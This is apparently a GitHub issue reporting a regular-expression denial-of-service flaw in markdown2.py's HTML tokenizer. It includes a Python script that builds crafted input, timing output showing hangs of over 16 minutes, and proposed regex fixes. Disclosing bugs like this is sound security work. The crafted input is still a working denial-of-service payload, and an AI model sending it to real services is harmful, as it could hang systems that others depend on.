Protential ReDoS vulnerability in markdown2.py

**Describe the bug**
Hi team, thanks for your great work! I think I found a small vulnerability that might lead to DDoS in the system
At line 1265 in `markdown2.py`
the regex `_sorta_html_tokenize_re` is vulnerable to ReDoS when it is used in
`for token in self._sorta_html_tokenize_re.split(text):`

**To Reproduce**
I have a test file here and can be run directly
```python3
import markdown2
import time

for repeat_count in range(0,5000,500):
    start_time = time.time()
    markdown_text = "<p m=\"1\"" * repeat_count + " "* repeat_count + " " * repeat_count + "</div"

    start_time = time.time()
    html_output = markdown2.markdown(markdown_text, extras=["markdown-in-html"])
    end_time = time.time()
    print(f"repeat_count/length: {repeat_count}/{len(markdown_text)} Time taken: {end_time - start_time:.6f} seconds")

```
The result is like this
```python3
repeat_count/length: 0/5 Time taken: 0.004103 seconds
repeat_count/length: 500/5005 Time taken: 3.075934 seconds
repeat_count/length: 1000/10005 Time taken: 23.623668 seconds
repeat_count/length: 1500/15005 Time taken: 78.709412 seconds
repeat_count/length: 2000/20005 Time taken: 186.460569 seconds
repeat_count/length: 2500/25005 Time taken: 361.830719 seconds
repeat_count/length: 3000/30005 Time taken: 625.041665 seconds
repeat_count/length: 3500/35005 Time taken: 991.112904 seconds
```


As we can see, the time consumption increase significantly, and only 30k chars can lead to the program hang for more than **16 mins**.

**Expected behavior**
I think we can add a limit like replace `\s*` with `\s{0,100}` or maybe divide the regex into multiple sub-regex? Maybe it can help to solve the recursion problem.

For the regex `_sorta_html_tokenize_re` , the issue occurs due to the subregex
```python3
              (?:             # attributes
                    \s+                           # whitespace after tag
                    (?:[^\t<>"'=/]+:)?
                    [^<>"'=/]+=                   # attr name
                    (?:".*?"|'.*?'|[^<>"'=/\s]+)  # value, quoted or unquoted. If unquoted, no spaces allowed
                )*
                \s*/?>
```
The `(...)*` and `\s*` both try to eagerly match strings, leading to massive recusrion.

I tried to remove one of them from the regex, and the performance significantly improved
```python3
# remove \s*
repeat_count/length: 0/5 Time taken: 0.004091 seconds
repeat_count/length: 500/6005 Time taken: 0.080678 seconds
repeat_count/length: 1000/12005 Time taken: 0.326295 seconds
repeat_count/length: 1500/18005 Time taken: 0.712929 seconds
repeat_count/length: 2000/24005 Time taken: 1.258733 seconds
repeat_count/length: 2500/30005 Time taken: 2.067534 seconds
repeat_count/length: 3000/36005 Time taken: 2.911231 seconds
repeat_count/length: 3500/42005 Time taken: 3.897797 seconds
repeat_count/length: 4000/48005 Time taken: 5.017783 seconds
repeat_count/length: 4500/54005 Time taken: 6.552440 seconds
```

```python3
# remove `(...)*`
repeat_count/length: 0/5 Time taken: 0.004098 seconds
repeat_count/length: 500/6005 Time taken: 0.088631 seconds
repeat_count/length: 1000/12005 Time taken: 0.347793 seconds
repeat_count/length: 1500/18005 Time taken: 0.774725 seconds
repeat_count/length: 2000/24005 Time taken: 1.367911 seconds
repeat_count/length: 2500/30005 Time taken: 2.169432 seconds
repeat_count/length: 3000/36005 Time taken: 3.167773 seconds
repeat_count/length: 3500/42005 Time taken: 4.229510 seconds
repeat_count/length: 4000/48005 Time taken: 5.558357 seconds
repeat_count/length: 4500/54005 Time taken: 6.914844 seconds
```



Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Protential ReDoS vulnerability in markdown2.py #633

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Protential ReDoS vulnerability in markdown2.py #633

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions